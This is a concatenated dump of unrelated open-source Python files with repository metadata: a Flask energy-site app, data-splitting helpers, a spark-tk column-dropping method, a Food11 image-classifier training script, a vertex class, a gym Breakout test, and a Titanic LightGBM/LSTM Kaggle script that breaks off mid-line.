pass\n","repo_name":"jorge-vh/McQueen","sub_path":"src/puzzlebot_sim/src/WEEK1-4/chatgpt.py","file_name":"chatgpt.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34821516021","text":"import json\r\n\r\nfrom controller import ConfigurationControl, SitesControll, LiveDataControl\r\n\r\nfrom flask import Flask, session, redirect, url_for, request, render_template\r\nfrom markupsafe import escape\r\n\r\ndata = Flask(__name__)\r\ndata.secret_key = b'_5#y2L\"F4Q8z\\n\\xec]/'\r\nCHECKBOX_MAPPING = {'on': True,\r\n 'off': False}\r\n\r\n\r\n@data.route('/', methods=[\"GET\"])\r\ndef index():\r\n return render_template(\"first.html\")\r\n\r\n\r\n@data.route('/site/create', methods=[\"GET\", \"POST\"])\r\ndef create_site():\r\n \"\"\"\r\n\r\n :return: new site\r\n \"\"\"\r\n if request.method == 'POST':\r\n SitesControll.create_site(request.form[\"site_name\"], request.form[\"site_location\"])\r\n return render_template(\"new_site.html\")\r\n\r\n\r\n@data.route('/conf//create', methods=[\"GET\", \"POST\"])\r\ndef create_conf(site_id: int):\r\n \"\"\"\r\n\r\n :param site_id:\r\n :return: new configuration\r\n \"\"\"\r\n if request.method == 'POST':\r\n battery = {\"vendor\": request.form[\"battery_vendor\"],\r\n \"capacity_kwh\": request.form[\"battery_capacity_kwh\"],\r\n \"max_power_kw\": request.form[\"battery_max_power_kw\"]\r\n }\r\n production = {\r\n \"pv\": {\"units\": request.form[\"pv_units\"], \"kwp\": request.form[\"pv_kwp\"]},\r\n \"bio\": {\"units\": request.form[\"bio_units\"]},\r\n \"cro\": {\"units\": request.form[\"cro_units\"], \"kwp\": request.form[\"cro_kwp\"]}\r\n }\r\n ConfigurationControl.create_new(site_id, battery, production)\r\n return render_template(\"new_conf.html\")\r\n\r\n\r\n@data.route('/live_data//create', methods=[\"GET\", \"POST\"])\r\ndef create_live_data(site_id: int):\r\n \"\"\"\r\n\r\n :param site_id:\r\n :return: new live data\r\n \"\"\"\r\n if request.method == 'POST':\r\n LiveDataControl.create_live_data(site_id, int(request.form[\"soc\"]),\r\n int(request.form[\"load_kwh\"]),\r\n int(request.form[\"net_load_kwh\"]),\r\n \"pv_notification\" in request.form,\r\n \"bio_notification\" in request.form,\r\n \"cro_notification\" in request.form)\r\n\r\n return render_template(\"live_data.html\")\r\n\r\n\r\n@data.route('/sites', methods=[\"GET\"])\r\ndef get_sites():\r\n \"\"\"\r\n\r\n :return: all sites in data base\r\n \"\"\"\r\n header = '''\r\n\r\n the sites List\r\n '''\r\n\r\n body = \"\"\r\n for i in SitesControll.get_all(): 
 # move all list\r\n        body += \"\" + str(json.dumps(i, sort_keys=True, indent=4)) + \"
\"\r\n\r\n return header + body\r\n\r\n\r\n@data.route('/conf', methods=[\"GET\"])\r\ndef get_configurations():\r\n \"\"\"\r\n\r\n :return: return all conf in data base\r\n \"\"\"\r\n heder = '''\r\n\r\n the configurations List\r\n '''\r\n\r\n body = \"\"\r\n for i in ConfigurationControl.get_all(): # move all list\r\n body += \"
\" + str(json.dumps(i, sort_keys=True, indent=4)) + \"
\"\r\n\r\n return heder + body\r\n\r\n\r\n@data.route('/live_data', methods=[\"GET\"])\r\ndef get_live_data():\r\n \"\"\"\r\n\r\n :return: return all live data\r\n \"\"\"\r\n header = '''\r\n\r\n live_data List\r\n '''\r\n\r\n body = \"\"\r\n for i in LiveDataControl.get_all_live_data(): # move all list\r\n body += \"
\" + str(json.dumps(i, sort_keys=True, indent=4)) + \"
\"\r\n\r\n return header + body\r\n\r\n\r\n@data.route('/conf//edit', methods=['GET', \"POST\"])\r\ndef edit_conf(site_id: int):\r\n \"\"\"\r\n\r\n :param site_id: \r\n :return: edit configuration\r\n \"\"\"\r\n\r\n if request.method == 'POST':\r\n if request.form['submit'] == 'save':\r\n battery = {\"vendor\": request.form[\"battery_vendor\"],\r\n \"capacity_kwh\": request.form[\"battery_capacity_kwh\"],\r\n \"max_power_kw\": request.form[\"battery_max_power_kw\"]\r\n }\r\n production = {\r\n \"pv\": {\"units\": request.form[\"pv_units\"], \"kwp\": request.form[\"pv_kwp\"]},\r\n \"bio\": {\"units\": request.form[\"bio_units\"]},\r\n \"cro\": {\"units\": request.form[\"cro_units\"], \"kwp\": request.form[\"cro_kwp\"]}\r\n }\r\n ConfigurationControl.edit_conf(site_id, battery, production)\r\n conf = ConfigurationControl.get_by_id(site_id)\r\n return render_template(\"edit_conf.html\", conf=conf[0])\r\n if request.method == 'GET':\r\n conf = ConfigurationControl.get_by_id(site_id)\r\n if conf:\r\n print(conf)\r\n return render_template(\"edit_conf.html\", conf=conf[0])\r\n else:\r\n return 'Error loading #{id}'.format(id=site_id)\r\n\r\n\r\n@data.route('/live_data//edit', methods=['GET', \"POST\"])\r\ndef edit_live_data(site_id: int):\r\n \"\"\"\r\n\r\n :param site_id:\r\n :return: edit live data\r\n \"\"\"\r\n print(site_id)\r\n if request.method == 'POST':\r\n if request.form['submit'] == 'save':\r\n LiveDataControl.edit_live_data(site_id, int(request.form[\"soc\"]),\r\n int(request.form[\"load_kwh\"]),\r\n int(request.form[\"net_load_kwh\"]),\r\n \"pv_notification\" in request.form,\r\n \"bio_notification\" in request.form,\r\n \"cro_notification\" in request.form)\r\n return render_template(\"edit_live_data.html\")\r\n if request.method == 'GET':\r\n return render_template(\"edit_live_data.html\")\r\n","repo_name":"kerenor557100/AGEERA_K-_Or","sub_path":"view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":5557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27027278741","text":"# Import libraries:\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\n\nclass Data:\n # function to clean te dataset:\n def profile(df):\n\n \"\"\"\n Param df is dataframe\n Function checks for NaNs, print them, and print the description.\n \"\"\"\n nans = df.isnull().sum()\n nans = pd.DataFrame(nans, columns=['NaNs'])\n\n # Check and print missing values:\n print('Missing Values :', '\\n', nans)\n\n # Describe dataset:\n\n print('\\n')\n print('Describe dataset :', '\\n', df.describe().T)\n\n def split(df):\n # Make the train/test split:\n \"\"\"\n Param df is dataframe.\n Function split the dataframe into train, validation and test.\n \"\"\"\n train, test = train_test_split(\n df, train_size=0.8,\n test_size=0.2,\n random_state=42\n )\n train, validation = train_test_split(\n train, train_size=0.8,\n test_size=0.2,\n random_state=42\n )\n print('\\n')\n print('Train shape : ', train.shape)\n print('Validation shape: ', validation.shape)\n print('Test shape : ', test.shape)","repo_name":"medamer/lambdata-medamer","sub_path":"my_lambdata/my_mod.py","file_name":"my_mod.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17899245315","text":"from sparktk.frame.pyframe import PythonFrame\nfrom sparktk.frame.schema import get_indices_for_selected_columns\n\n\ndef drop_columns(self, columns):\n \"\"\"\n Drops 
columns from the frame\n\n Parameters\n ----------\n\n :param columns: (str or List[str]) names of the columns to drop\n\n Examples\n --------\n\n For this example, the Frame object *my_frame* accesses a frame with 4 columns\n columns *column_a*, *column_b*, *column_c* and *column_d* and drops 2 columns *column_b* and *column_d* using drop columns.\n\n\n \n >>> sc=[(\"column_a\", str), (\"column_b\", int), (\"column_c\", str), (\"column_d\", int)]\n >>> rows = [[\"Alameda\", 1, \"CA\", 7], [\"Princeton\", 2, \"NJ\", 6], [\"NewYork\", 3 , \"NY\", 9]]\n >>> frame = tc.frame.create(rows, sc)\n -etc-\n\n \n\n >>> print frame.schema\n [('column_a', ), ('column_b', ), ('column_c', ), ('column_d', )]\n\n\n Eliminate columns *column_b* and *column_d*:\n\n >>> frame.drop_columns([\"column_b\", \"column_d\"])\n >>> print frame.schema\n [('column_a', ), ('column_c', )]\n\n Now the frame only has the columns *column_a* and *column_c*.\n For further examples, see: ref:`example_frame.drop_columns`.\n\n \"\"\"\n if isinstance(columns, basestring):\n columns = [columns]\n if self._is_scala:\n self._scala.dropColumns(self._tc.jutils.convert.to_scala_vector_string(columns))\n else:\n victim_indices = get_indices_for_selected_columns(self.schema, columns)\n survivor_indices = [i for i in xrange(len(self.schema)) if i not in victim_indices]\n filtered_schema = [self.schema[i] for i in survivor_indices]\n\n def filter_fields(row):\n return [row[i] for i in survivor_indices]\n filtered_rdd = self.rdd.map(filter_fields)\n self._frame = PythonFrame(filtered_rdd, filtered_schema)\n","repo_name":"tapanalyticstoolkit/spark-tk","sub_path":"python/sparktk/frame/ops/drop_columns.py","file_name":"drop_columns.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"54"} +{"seq_id":"29414570286","text":"import os\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision\nimport torchvision.transforms as transforms\nfrom model import ImageNet\nfrom argparser import get_args\nfrom dataloader import Food11Dataset#, ImgAugTransform\n\ndef forward(name, dataloader, model, lossfunction = None, optimizer = None) :\n\n\tavgcorrect = [0.0] * 11\n\tcases = [0.0] * 11\n\n\tfor i, (inputs_cpu, labels_cpu) in enumerate(dataloader):\n\t\t# initialize\n\t\ttorch.cuda.empty_cache()\n\t\tif optimizer :\n\t\t\toptimizer.zero_grad()\n\t\t# forward\n\t\tinputs = inputs_cpu.half().cuda()\n\t\toutputs = model(inputs)\n\t\tdel inputs, inputs_cpu\n\n\t\t# loss and step\n\t\tlabels = labels_cpu.cuda()\n\t\tdel labels_cpu\n\t\tif lossfunction :\n\t\t\tloss = lossfunction(outputs, labels)\n\t\t\tloss.backward()\n\t\t\tdel loss\n\t\tif optimizer :\n\t\t\toptimizer.step()\n\t\t\n\t\t# convert to prediction\n\t\ttmp, pred = outputs.max(1)\n\t\tdel tmp, outputs\n\t\t\n\t\t# calculate accuracy\n\t\tfor i in range(len(pred)) :\n\t\t\tif pred[i] == labels[i] :\n\t\t\t\tavgcorrect[labels[i]] += 1\n\t\t\tcases[labels[i]] += 1\n\t\tdel labels, pred\n\n\t# print result\n\tavg = 0.0\n\tprint('\\t%s :'%name, '%.2f%%'%(sum(avgcorrect) / sum(cases) * 100))\n\tfor i in range(11) :\n\t\tprint('\\t\\tclass', '%2d'%i, '%5d'%cases[i], '%5.2f%%'%(avgcorrect[i] / cases[i] * 100))\n\t\tavg += avgcorrect[i] / cases[i]\n\n\tprint('\\t\\tPer-class %5.2f%%'%(avg * 100 / 11))\n\t# return accuracy\n\treturn avg\n\nif __name__ == '__main__' :\n\n\targs = get_args()\n\n\ttransform_train = transforms.Compose([\n\t\ttransforms.Resize((256, 256)),\n\t\t# 
ImgAugTransform(),\n\t transforms.ToTensor(),\n\t transforms.Normalize([0.4965, 0.3980, 0.3058], [0.3071, 0.2927, 0.2835]),\n\t])\n\n\ttransform_test = transforms.Compose([\n\t\ttransforms.Resize((256, 256)),\n\t transforms.ToTensor(),\n\t transforms.Normalize([0.4965, 0.3980, 0.3058], [0.3071, 0.2927, 0.2835]),\n\t])\n\n\tweights = torch.Tensor([len(os.listdir('C:\\\\Users\\\\Frank\\\\Machine Learning\\\\DLSR\\\\dataset\\\\skewed_training\\\\' + str(i) + '\\\\')) for i in range(11)])\n\tcount = torch.Tensor([])\n\ttotal = sum(weights)\n\tfor i in range(11) :\n\t\tcount = torch.cat((count, torch.Tensor([total / weights[i] for s in range(int(weights[i]))])))\n\tsampler = torch.utils.data.sampler.WeightedRandomSampler(count, len(count))\n\n\ttrainset = Food11Dataset('C:\\\\Users\\\\Frank\\\\Machine Learning\\\\DLSR\\\\dataset\\\\skewed_training\\\\', transform_train)\n\tvalidationset = Food11Dataset('C:\\\\Users\\\\Frank\\\\Machine Learning\\\\DLSR\\\\dataset\\\\validation\\\\', transform_test)\n\ttestset = Food11Dataset('C:\\\\Users\\\\Frank\\\\Machine Learning\\\\DLSR\\\\dataset\\\\evaluation\\\\', transform_test)\n\n\ttrainloader = torch.utils.data.DataLoader(trainset, batch_size = args['batch_size'], shuffle = False, num_workers = args['thread'], pin_memory = True, drop_last = True, sampler = sampler)\n\tvalidationloader = torch.utils.data.DataLoader(validationset, batch_size = 64, num_workers = args['thread'])\n\ttestloader = torch.utils.data.DataLoader(testset, batch_size = 64, num_workers = args['thread'])\n\n\tmodel = None\n\n\tif args['load'] :\n\t\tmodel = torch.load('C:\\\\Users\\\\Frank\\\\Machine Learning\\\\DLSR\\\\weight\\\\' + args['load'])\n\telse :\n\t\tmodel = ImageNet().half().cuda()\n\n\tcriterion = nn.CrossEntropyLoss()\n\toptimizer = optim.SGD(model.parameters(), lr = args['learning_rate'], momentum = 0.9)\n\n\tprint('Training :')\n\n\tavgloss = 0.0\n\tavgcorrect = [0.0] * 11\n\tcases = [0.0] * 11\n\tlastaccuracy = 0\n\n\tmodel.eval()\n\twith torch.no_grad() :\n\t\tlastaccuracy = forward('Validation', validationloader, model)\n\n\tif args['save'] :\n\t\ttorch.save(model, 'C:\\\\Users\\\\Frank\\\\Machine Learning\\\\DLSR\\\\weight\\\\' + args['save'])\n\n\tfor epoch in range(args['epoch']): # loop over the dataset multiple times\n\n\t\tprint('\\n\\tEpoch : ' + str(epoch))\n\n\t\tmodel.train()\n\t\tforward('Training', trainloader, model, criterion, optimizer)\n\n\t\tmodel.eval()\n\t\twith torch.no_grad() :\n\t\t\taccuracy = forward('Validation', validationloader, model)\n\n\t\tif args['save'] and accuracy > lastaccuracy:\n\t\t\tlastaccuracy = accuracy\n\t\t\ttorch.save(model, 'C:\\\\Users\\\\Frank\\\\Machine Learning\\\\DLSR\\\\weight\\\\' + args['save'])\n\n\tprint('Testing :')\n\n\tif args['save'] :\n\t\tdel model\n\t\tmodel = torch.load('C:\\\\Users\\\\Frank\\\\Machine Learning\\\\DLSR\\\\weight\\\\' + args['save'])\n\n\tmodel.eval()\n\twith torch.no_grad() :\n\t\tforward('Test', testloader, model)","repo_name":"FrankLu007/Deep-Learning-Systems-and-Realization","sub_path":"DLSR_lab2_0516310/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9030791387","text":"class Vertex:\n \"\"\"\n Represent a single vertex which is a single point in world space that has a\n specific material, shader type, normal and (u, v) coordinate for the\n texture.\n\n Args:\n position(numpy.array): Position in world coordinates\n material(Material): The 
material to be rendered for this vertex\n shader_type(string): The type of shader to use for this vertex\n n(numpy.array): The vector normal at this vertex\n u(float): Value for u texture coordinate at this vertex\n v(float): Value for u texture coordinate at this vertex\n \"\"\"\n def __init__(\n self, position,\n material=None,\n shader_type=None,\n n=None,\n u=None,\n v=None\n ):\n self.position = position\n self.material = material\n self.shader_type = shader_type\n self.n = n\n self.u = u\n self.v = v","repo_name":"HenrYxZ/sombra","sub_path":"vertex.py","file_name":"vertex.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"54"} +{"seq_id":"37549361628","text":"import gym\nimport time\n\nenv = gym.make(\"Breakout-v0\")\n\nprint(env.observation_space.shape)\nprint(env.action_space)\n\nenv.reset()\nenv.render()\n\nwhile True:\n act = int(input('type action'))\n print(env.step(act))\n env.render()\n","repo_name":"safijari/rl-tutorials","sub_path":"gym_tests/test_breakout.py","file_name":"test_breakout.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"2554347385","text":"\nimport sys\nimport os\nimport copy\nimport math\nimport subprocess\nfrom collections import OrderedDict\nimport pandas as pd\nimport numpy as np\nfrom tqdm import tqdm\nimport random\nimport torch\nimport torch.nn as nn\nfrom lightgbm import LGBMClassifier\n\n#Initialise the random seeds\ndef random_init(**kwargs):\n random.seed(kwargs['seed'])\n np.random.seed(kwargs['seed'])\n torch.manual_seed(kwargs['seed'])\n torch.cuda.manual_seed(kwargs['seed'])\n torch.backends.cudnn.deterministic = True\n \ndef normalise_data(df):\n df.loc[df['Pclass'].isna(),'Pclass'] = 0\n df.loc[df['Sex'].isna(),'Sex'] = '*'\n df.loc[df['Age'].isna(),'Age'] = -1\n df.loc[df['SibSp'].isna(),'SibSp'] = -1\n df.loc[df['Parch'].isna(),'Parch'] = -1\n df.loc[df['Embarked'].isna(),'Embarked'] = '*'\n df.loc[df['Fare'].isna(),'Fare'] = -1\n df.loc[df['Ticket'].isna(),'Ticket'] = -1\n df['Ticket'] = [''.join(c for c in t if c.isdigit()) if str(t)==t else str(t) for t in df['Ticket']]\n df['Ticket'] = [int(t) if len(t)>0 else -1 for t in df['Ticket']]\n df['Name'] = [normalise_name(n) for n in df['Name']]\n return df\n\n#Normalise the text and reorder names and surnames\ndef normalise_name(text):\n text = text.upper()\n text = ' '.join(text.split(',')[::-1])\n text = text.strip()\n return text\n \ndef load_tree_data(df,target=False,**kwargs):\n num_samples = len(df)\n sample_size = len(args['cat_feats']) + len(args['num_feats'])\n dataset = np.zeros((num_samples,sample_size))\n idx = 0\n for c in args['cat_feats']:\n dataset[:,idx] = np.array([args['categories'][c][v] if v in args['categories'][c] else len(args['categories'][c]) for v in df[c]])\n idx += 1\n for n in args['num_feats']:\n dataset[:,idx] = np.array(df[n])\n idx += 1\n if target:\n targets = np.array(df['Survived'])\n else:\n targets = None\n \n return dataset, targets\n\n#Read the existing characters\ndef read_vocabulary(train_text, **kwargs):\n vocab = dict()\n counts = dict()\n num_words = 0\n for line in train_text:\n line = (list(line.strip()) if kwargs['characters'] else line.strip().split())\n for char in line:\n if char not in vocab:\n vocab[char] = num_words\n counts[char] = 0\n num_words+=1\n counts[char] += 1\n num_words = 0\n vocab2 = dict()\n if not kwargs['characters']:\n for w in 
vocab:\n if counts[w] >= args['min_count']:\n vocab2[w] = num_words\n num_words += 1\n vocab = vocab2\n for word in [kwargs['start_token'],kwargs['end_token'],kwargs['unk_token']]:\n if word not in vocab:\n vocab[word] = num_words\n num_words += 1\n return vocab\n\n#Load the data into torch tensors\ndef load_data(text, targets=None, randomize=False, **kwargs):\n num_seq = len(text)\n max_words = max([len((list(line.strip()) if kwargs['characters'] else line.strip().split())) for line in text])+2\n dataset = len(kwargs['vocab'])*torch.ones((max_words,num_seq),dtype=torch.long)\n labels = torch.zeros((num_seq),dtype=torch.uint8)\n idx = 0\n utoken_value = kwargs['vocab'][kwargs['unk_token']]\n for i,line in tqdm(enumerate(text),desc='Allocating data memory',disable=(kwargs['verbose']<2)):\n words = (list(line.strip()) if kwargs['characters'] else line.strip().split())\n if len(words)==0 or words[0] != kwargs['start_token']:\n words.insert(0,kwargs['start_token'])\n if words[-1] != kwargs['end_token']:\n words.append(kwargs['end_token'])\n for jdx,word in enumerate(words):\n dataset[jdx,idx] = kwargs['vocab'].get(word,utoken_value)\n if targets is not None:\n labels[idx] = targets[i]\n idx += 1\n \n if randomize:\n idx = [i for i in range(dataset.shape[1])]\n random.shuffle(idx)\n dataset = dataset[:,idx]\n labels = labels[idx]\n \n return dataset, labels\n\n#Class for a LSTM encoder\nclass LSTMEncoder(nn.Module):\n def __init__(self, **kwargs):\n \n super(LSTMEncoder, self).__init__()\n #Base variables\n self.vocab = kwargs['vocab']\n self.in_dim = len(self.vocab)\n self.start_token = kwargs['start_token']\n self.end_token = kwargs['end_token']\n self.unk_token = kwargs['unk_token']\n self.characters = kwargs['characters']\n self.embed_dim = kwargs['embedding_size']\n self.hid_dim = kwargs['hidden_size']\n self.n_layers = kwargs['num_layers']\n \n #Define the embedding layer\n self.embed = nn.Embedding(self.in_dim+1,self.embed_dim,padding_idx=self.in_dim)\n #Define the lstm layer\n self.lstm = nn.LSTM(input_size=self.embed_dim,hidden_size=self.hid_dim,num_layers=self.n_layers)\n \n def forward(self, inputs, lengths):\n #Inputs are size (LxBx1)\n #Forward embedding layer\n emb = self.embed(inputs)\n #Embeddings are size (LxBxself.embed_dim)\n\n #Pack the sequences for GRU\n packed = torch.nn.utils.rnn.pack_padded_sequence(emb, lengths)\n #Forward the GRU\n packed_rec, self.hidden = self.lstm(packed,self.hidden)\n #Unpack the sequences\n rec, _ = torch.nn.utils.rnn.pad_packed_sequence(packed_rec)\n #Hidden outputs are size (LxBxself.hidden_size)\n \n #Get last embeddings\n out = rec[lengths-1,list(range(rec.shape[1])),:]\n #Outputs are size (Bxself.hid_dim)\n \n return out\n \n def init_hidden(self, bsz):\n #Initialise the hidden state\n weight = next(self.parameters())\n self.hidden = (weight.new_zeros(self.n_layers, bsz, self.hid_dim),weight.new_zeros(self.n_layers, bsz, self.hid_dim))\n\n def detach_hidden(self):\n #Detach the hidden state\n self.hidden=(self.hidden[0].detach(),self.hidden[1].detach())\n\n def cpu_hidden(self):\n #Set the hidden state to CPU\n self.hidden=(self.hidden[0].detach().cpu(),self.hidden[1].detach().cpu())\n\n#Class for an MLP predictor\nclass Predictor(nn.Module):\n def __init__(self, **kwargs):\n \n super(Predictor, self).__init__()\n self.hid_dim = kwargs['hidden_size']\n self.out_dim = 2\n #Define the output layer and softmax\n self.linear = nn.Linear(self.hid_dim,self.out_dim)\n self.softmax = nn.LogSoftmax(dim=1)\n \n def forward(self,inputs):\n #Outputs are 
size (Bxself.hid_dim)\n out = self.softmax(self.linear(inputs))\n return out\n\n#Train one epoch of the model\ndef train_model(trainset,trainlabels,encoder,predictor,optimizer,criterion,**kwargs):\n trainlen = trainset.shape[1]\n nbatches = math.ceil(trainlen/kwargs['batch_size'])\n total_loss = 0\n total_backs = 0\n with tqdm(total=nbatches,disable=(kwargs['verbose']<2)) as pbar:\n encoder = encoder.train()\n for b in range(nbatches):\n #Data batch\n X = trainset[:,b*kwargs['batch_size']:min(trainlen,(b+1)*kwargs['batch_size'])].clone().long().to(kwargs['device'])\n Y = trainlabels[b*kwargs['batch_size']:min(trainlen,(b+1)*kwargs['batch_size'])].clone().long().to(kwargs['device'])\n mask = torch.clamp(len(kwargs['vocab'])-X,max=1)\n seq_length = torch.sum(mask,dim=0)\n ordered_seq_length, dec_index = seq_length.sort(descending=True)\n max_seq_length = torch.max(seq_length)\n X = X[:,dec_index]\n Y = Y[dec_index]\n X = X[0:max_seq_length]\n #Forward pass\n encoder.init_hidden(X.size(1))\n embeddings = encoder(X,ordered_seq_length.cpu())\n posteriors = predictor(embeddings)\n loss = criterion(posteriors,Y)\n #Backpropagate\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n #Estimate the latest loss\n if total_backs == 100:\n total_loss = total_loss*0.99+loss.detach().cpu().numpy()\n else:\n total_loss += loss.detach().cpu().numpy()\n total_backs += 1\n encoder.detach_hidden()\n pbar.set_description(f'Training epoch. Loss {total_loss/(total_backs+1):.2f}')\n pbar.update()\n return total_loss/(total_backs+1)\n\n#Get predictions from a model\ndef evaluate_model(testset,encoder,predictor,**kwargs):\n testlen = testset.shape[1]\n nbatches = math.ceil(testlen/kwargs['batch_size'])\n predictions = np.zeros((testlen,))\n with torch.no_grad():\n encoder = encoder.eval()\n for b in range(nbatches):\n #Data batch\n X = testset[:,b*kwargs['batch_size']:min(testlen,(b+1)*kwargs['batch_size'])].clone().long().to(kwargs['device'])\n mask = torch.clamp(len(kwargs['vocab'])-X,max=1)\n seq_length = torch.sum(mask,dim=0)\n ordered_seq_length, dec_index = seq_length.sort(descending=True)\n max_seq_length = torch.max(seq_length)\n X = X[:,dec_index]\n X = X[0:max_seq_length]\n #Forward pass\n encoder.init_hidden(X.size(1))\n embeddings = encoder(X,ordered_seq_length.cpu())\n posteriors = predictor(embeddings)\n estimated = posteriors[:,1]#torch.argmax(posteriors,dim=1)\n rev_dec_index = list(range(estimated.shape[0]))\n for i,j in enumerate(dec_index):\n rev_dec_index[j] = i\n predictions[b*kwargs['batch_size']:min(testlen,(b+1)*kwargs['batch_size'])] = np.exp(estimated[rev_dec_index].detach().cpu().numpy())\n return predictions\n\n\ndef compute_results(predictions,labels):\n if predictions.ndim == 2:\n predictions = predictions[:,1]\n thresholds = np.arange(1.0,-0.00001,-0.001)\n fpr = []\n tpr = []\n acc = []\n for th in thresholds:\n tp = np.sum((predictions >= th) * labels)\n tn = np.sum((predictions < th) * (1-labels))\n fp = np.sum((predictions >= th) * (1-labels))\n fn = np.sum((predictions < th) * labels)\n tpr.append(tp/(tp+fn))\n fpr.append(fp/(tn+fp))\n acc.append((tp+tn)/(tp+tn+fp+fn))\n results = pd.DataFrame({'thresholds':thresholds,'tpr':tpr,'fpr':fpr,'acc':acc})\n return results\n \nargs = {\n 'cv_percentage': 0.1,\n 'seed': 0,\n 'num_leaves': 90,\n 'max_depth': 30,\n 'learning_rate': 0.1,\n 'n_estimators': 200,\n }\n\nprint('Training LightGBM')\nrandom_init(**args)\n\ntrain_data = normalise_data(pd.read_csv('../input/tabular-playground-series-apr-2021/train.csv'))\ntrain_data = 
train_data.sample(frac=1).reset_index(drop=True)\nvalid_data = train_data.iloc[-int(len(train_data)*args['cv_percentage']):]\ntrain_data = train_data.iloc[:-int(len(train_data)*args['cv_percentage'])]\ntest_data = normalise_data(pd.read_csv('../input/tabular-playground-series-apr-2021/test.csv'))\nargs['cat_feats'] = ['Pclass','Sex','Embarked']\nargs['num_feats'] = ['Age','SibSp','Parch','Ticket','Fare']\nargs['categories'] = {c: {a:i for i,a in enumerate(np.unique(train_data[c]))} for c in args['cat_feats']}\ntrainset, traintargets = load_tree_data(train_data,target=True,**args)\nvalidset, validtargets = load_tree_data(valid_data,target=True,**args)\nargs['num_mean'] = np.mean(trainset[:,len(args['cat_feats']):],axis=0)\nargs['num_std'] = np.std(trainset[:,len(args['cat_feats']):],axis=0)\ntestset, _ = load_tree_data(test_data,target=False,**args)\n\ntrainset[:,len(args['cat_feats']):] -= args['num_mean']\ntrainset[:,len(args['cat_feats']):] /= args['num_std']\nvalidset[:,len(args['cat_feats']):] -= args['num_mean']\nvalidset[:,len(args['cat_feats']):] /= args['num_std']\ntestset[:,len(args['cat_feats']):] -= args['num_mean']\ntestset[:,len(args['cat_feats']):] /= args['num_std']\n\nlgb = LGBMClassifier(num_leaves=args['num_leaves'],max_depth=args['max_depth'],learning_rate=args['learning_rate'],n_estimators=args['n_estimators'],objective=\"binary\")\nlgb.fit(trainset,traintargets)\nval_pred_lgb = lgb.predict_proba(validset)[:,1]\ntest_pred_lgb = lgb.predict_proba(testset)[:,1]\nresults = compute_results(val_pred_lgb,validtargets)\nth = results.loc[results['acc']==np.max(results['acc'])]['thresholds'].values[0]\nacc = 100*results.loc[results['acc']==np.max(results['acc'])]['acc'].values[0]\nauc = np.trapz(results['tpr'],x=results['fpr'])\npos = 100*sum(test_pred_lgb >= th)/test_pred_lgb.shape[0]\nprint('Validation AUC: {0:.3f}, validation accuracy: {1:.2f}%@{2:.3f}, test survival rate: {3:.2f}%'.format(auc,acc,th,pos))\n\nprint('Training LSTM name encoder')\nargs = {\n 'input_file': None,\n 'vocabulary': None,\n 'cv_percentage': 0.1,\n 'epochs': 20,\n 'batch_size': 32,\n 'embedding_size': 16,\n 'hidden_size': 64,\n 'num_layers': 1,\n 'learning_rate': 0.001,\n 'seed': 0,\n 'start_token': '*s*',\n 'end_token': '*\\s*',\n 'unk_token': '*UNK*',\n 'verbose': 1,\n 'characters': True,\n 'min_count': 1,\n 'device': torch.device(('cuda:0' if torch.cuda.is_available() else 'cpu'))\n }\n\n#Read data\nrandom_init(**args)\ntrain_text = train_data.Name.values\nvalid_text = valid_data.Name.values\ntrain_targets = train_data.Survived.values\nvalid_targets = valid_data.Survived.values\ntest_text = test_data.Name.values\n\n#Basic stats\nprint('Training: {0:d} names. Validation: {1:d}. 
Evaluation: {2:d} names'.format(len(train_text),len(valid_text),len(test_text)))\nprint('{0:.2f}% of the training set are survival examples'.format(100*sum(train_targets)/len(train_text)))\n\n#Make vocabulary and load data\nargs['vocab'] = read_vocabulary(train_text, **args)\ntrainset, trainlabels = load_data(train_text, train_targets, randomize=True, **args)\nvalidset, validlabels = load_data(valid_text, valid_targets, randomize=False, **args)\ntestset, _ = load_data(test_text, None, randomize=False, **args)\n\n#Create model, optimiser and criterion\nencoder = LSTMEncoder(**args).to(args['device'])\npredictor = Predictor(**args).to(args['device'])\noptimizer = torch.optim.Adam(list(encoder.parameters())+list(predictor.parameters()),lr=args['learning_rate'])\ncriterion = nn.NLLLoss(reduction='mean').to(args['device'])\n\n#Train epochs\nbest_acc = 0.0\nfor ep in range(1,args['epochs']+1):\n loss = train_model(trainset,trainlabels,encoder,predictor,optimizer,criterion,**args)\n val_pred = evaluate_model(validset,encoder,predictor,**args)\n test_pred = evaluate_model(testset,encoder,predictor,**args)\n results = compute_results(val_pred,validlabels.numpy())\n th = results.loc[results['acc']==np.max(results['acc'])]['thresholds'].values[0]\n acc = 100*results.loc[results['acc']==np.max(results['acc'])]['acc'].values[0]\n auc = np.trapz(results['tpr'],x=results['fpr'])\n pos = 100*sum(test_pred >= th)/len(test_text)\n if acc >= best_acc:\n best_results = copy.copy(results)\n best_acc = acc\n best_th = th\n test_pred_lstm = copy.copy(test_pred)\n val_pred_lstm = copy.copy(val_pred)\n print('Epoch: {0:d} of {1:d}. Training loss: {2:.2f}, validation AUC: {3:.3f}, validation accuracy: {4:.2f}%@{5:.3f}, test survival rate: {6:.2f}%'.format(ep,args['epochs'],loss,auc,acc,th,pos))\n\nbest_acc = 0.0\nfor w in np.arange(0.5,0.501,0.05):\n results = compute_results(val_pred_lgb*w+val_pred_lstm*(1-w),validlabels.numpy())\n th = results.loc[results['acc']==np.max(results['acc'])]['thresholds'].values[0]\n acc = 100*results.loc[results['acc']==np.max(results['acc'])]['acc'].values[0]\n auc = np.trapz(results['tpr'],x=results['fpr'])\n pos = 